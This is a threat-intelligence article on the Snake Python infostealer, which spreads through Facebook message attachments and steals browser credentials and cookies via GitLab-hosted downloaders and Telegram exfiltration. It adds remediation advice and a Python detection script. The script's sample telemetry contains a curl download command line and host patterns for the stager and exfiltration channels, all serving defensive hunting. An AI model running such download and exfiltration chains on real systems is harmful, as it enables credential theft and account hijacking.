New Python-Based Snake Info Stealer Spreading Through Facebook Messages

Facebook messages are being used by threat actors to deliver a Python-based information stealer dubbed Snake that's designed to capture credentials and other sensitive data. "The credentials harvested from unsuspecting users are transmitted to different platforms such as Discord, GitHub, and Telegram," Cybereason researcher Kotaro Ogino said in a technical report. Details about the campaign first emerged on the social media platform X in August 2023.

The attacks entail sending prospective victims seemingly innocuous RAR or ZIP archive files that, upon opening, activate the infection sequence. The intermediate stages involve two downloaders – a batch script and a cmd script – with the latter responsible for downloading and executing the information stealer from an actor-controlled GitLab repository. Cybereason said it detected three different variants of the stealer, the third one being an executable assembled by PyInstaller.

The malware, for its part, is designed to gather data from different web browsers, including Cốc Cốc, suggesting a Vietnamese focus. The collected information, which comprises credentials and cookies, is then exfiltrated in the form of a ZIP archive via the Telegram Bot API. The stealer is also designed to dump cookie information specific to Facebook, an indication that the threat actor is likely looking to hijack the accounts for their own purposes.

The malware operators are leveraging a GitHub vulnerability that allows an uploaded file associated with an issue on a repository to persist even in scenarios where the issue is never saved. "This means that anyone can upload a file to any git repository on GitHub, and not leave any trace that the file exists except for the direct link," the researchers said, adding that the malware comes fitted with capabilities for command-and-control (C2) communications.

Security Officer Comments:
The threat actor exploits the reputation and implicit trust that Facebook carries to trick users into trusting the messages they receive from this actor. They gain initial access through phishing Facebook messages that lure victims into downloading malicious attachments. The threat actor maintains 3 different variants of this infostealer, likely so it can deploy the most effective and appropriate payload for the victim's web browser. The infostealer gathers sensitive data such as credentials and cookies from multiple browsers, including Google Chrome. Based on a few indicators, we can reasonably conclude that the attackers are Vietnamese-speaking individuals. One indicator is that the two older variants of this infostealer only target three browsers, one of them being the Cốc Cốc browser, which is widely used by the Vietnamese community. Additionally, some of the comments in the scripts and the function names are written in Vietnamese. It is worth noting that the most recent variant of this malware does not obfuscate the primary script, showing that some TTPs are version-dependent.

Suggested Corrections:
Cybereason recommends taking these actions in your MDR:

  • Enable Application Control to block the execution of malicious files.
  • Enable Fileless Protection with detect mode on download payload.
  • Enable Variant Payload Prevention with prevent mode on Cybereason Behavioral execution prevention.
  • Ensure that users and employees are educated on the risks of downloading files from untrusted sources, especially via social media platforms while in a corporate network.
  • To hunt proactively, use the Investigation screen in the Cybereason Defense Platform and the queries in the Hunting Queries section to search for assets that have potentially been infected. Based on the search results, take further remediation actions, such as isolating and re-imaging the affected machines.
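The hunt suggested above can be expressed as a process-tree correlation over endpoint telemetry: a cmd.exe launching a .bat/.cmd script, a descendant pulling a file from gitlab.com, and a Python process under the same launcher talking to api.telegram.org (the exfiltration path described in the article). The code below is an added example, not Cybereason's hunting queries or the platform's own logic; the event schema, hostnames and sample events are constructed assumptions, and the GitLab path is a placeholder.

```python
from collections import defaultdict

# Constructed telemetry (not real IoCs): (host, pid, ppid, image, cmdline, remote_host or None)
SAMPLE_EVENTS = [
    ("ws01", 100, 1, "explorer.exe", "explorer.exe", None),
    ("ws01", 201, 100, "cmd.exe", r'cmd.exe /c "C:\Users\u\Downloads\invoice.cmd"', None),
    ("ws01", 202, 201, "curl.exe", "curl -o s.py https://gitlab.com/PLACEHOLDER/raw/s.py", "gitlab.com"),
    ("ws01", 203, 201, "python.exe", "python s.py", None),
    ("ws01", 203, 201, "python.exe", "python s.py", "api.telegram.org"),
    # Benign: developer tooling reaching PyPI with no batch/cmd launcher above it
    ("ws02", 300, 1, "python.exe", "python build.py", "pypi.org"),
]

SCRIPT_EXT = (".bat", ".cmd")       # stages 1-2: the batch and cmd downloaders
STAGER_HOST = "gitlab.com"          # stage 2 fetches the stealer from GitLab
EXFIL_HOST = "api.telegram.org"     # stage 3 exfiltrates the ZIP via the Telegram Bot API


def find_snake_chains(events):
    """Return sorted (host, pid) of Python processes that complete the whole chain."""
    parent, image, conns = {}, {}, defaultdict(set)
    for host, pid, ppid, img, cmd, remote in events:
        parent[(host, pid)] = ppid
        image[(host, pid)] = (img.lower(), cmd.lower())
        if remote:
            conns[(host, pid)].add(remote.lower())

    def ancestors(key):                      # walk (host, pid) up to the root
        host, pid = key
        while (host, pid) in parent:
            pid = parent[(host, pid)]
            yield (host, pid)

    def is_launcher(key):                    # cmd.exe running a .bat/.cmd script
        img, cmd = image.get(key, ("", ""))
        return img == "cmd.exe" and any(ext in cmd for ext in SCRIPT_EXT)

    hits = set()
    for key, (img, _) in image.items():     # the PyInstaller variant needs its own image match
        if not img.startswith("python") or EXFIL_HOST not in conns[key]:
            continue
        launcher = next((a for a in ancestors(key) if is_launcher(a)), None)
        if launcher is None:
            continue
        # Some process under the same launcher must have pulled the payload from GitLab
        if any(STAGER_HOST in conns[k] and launcher in set(ancestors(k)) for k in image):
            hits.add(key)
    return sorted(hits)


if __name__ == "__main__":
    for host, pid in find_snake_chains(SAMPLE_EVENTS):
        print(f"ALERT {host}: pid {pid} matches the batch -> cmd -> GitLab -> Telegram chain")
```

Hosts that match are candidates for the isolation and re-imaging step above; the benign ws02 event shows why each stage is required rather than alerting on any Python process with outbound traffic.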

Cybereason Technical Analysis